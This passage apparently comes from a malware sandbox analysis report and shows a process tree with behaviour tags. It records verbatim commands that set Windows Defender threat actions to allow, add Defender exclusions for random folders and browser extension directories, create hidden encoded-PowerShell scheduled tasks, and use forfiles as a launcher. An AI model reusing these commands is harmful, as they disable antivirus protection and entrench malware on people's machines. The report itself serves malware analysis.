                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:4048
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:4812
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:5452
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:1300
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:5512
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:3580
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:5224
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:5532
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:5564
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5524
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:5772
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:5764
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:5344
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:5368
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:5496
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:5660
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:5704
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:5292
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:5464
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:5680
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                2⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:5592
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:5944
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:6004
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:676
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:6044
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:5492
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:5296
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:5408
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:5388
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5372
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5600
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5272
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4012
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4712
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4572
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:940
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4684
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3464
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3344
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1432
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5416
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1176
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /CREATE /TN "ganyuWeAB" /SC once /ST 02:52:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:1684
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /run /I /tn "ganyuWeAB"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5852
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /DELETE /F /TN "ganyuWeAB"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2996
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 02:13:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\yVexjMf.exe\" 0c /QgMEdiddt 385134 /S" /V1 /F
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:5524
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5256
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 1396
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Program crash
                                                                                                                                                                                PID:2888
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:5912
                                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3056
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3692
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1340
                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4728
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:1092
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:6116
                                                                                                                                                                                    • C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\yVexjMf.exe
                                                                                                                                                                                      C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\yVexjMf.exe 0c /QgMEdiddt 385134 /S
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:5720
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5956
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5980
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:676
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:5356
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5288
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5608
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:5616
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4844
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:4416
                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:3856
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:1276
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:344
                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:2924
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4220
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
